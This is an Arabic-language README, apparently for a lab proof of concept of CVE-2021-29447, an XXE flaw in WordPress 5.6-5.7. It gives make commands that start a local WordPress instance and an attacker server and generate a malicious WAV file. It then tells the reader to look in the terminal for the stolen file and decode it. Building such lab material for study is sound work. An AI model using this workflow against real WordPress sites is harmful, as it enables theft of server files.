
إثبات مفهوم لاستغلال CVE-2021-29447، وهي ثغرة XXE موثّقة في ووردبريس 5.6-5.7. يتضمن إعداد بيئة مختبرية، وتوليد ملف WAV خبيث، وخادم مهاجم للاختبار التعليمي.
$ make up-wp
$ make up-mal
$ make make-wav
open http://localhost:8000/
open http://localhost:8000/wp-admin/
انظر في الطرفية إلى الملف المسروق ويمكن فك ترميزه
معلومات عن الأوامر الممكنة في ملف المهاجم dtd https://www.php.net/manual/en/wrappers.php.php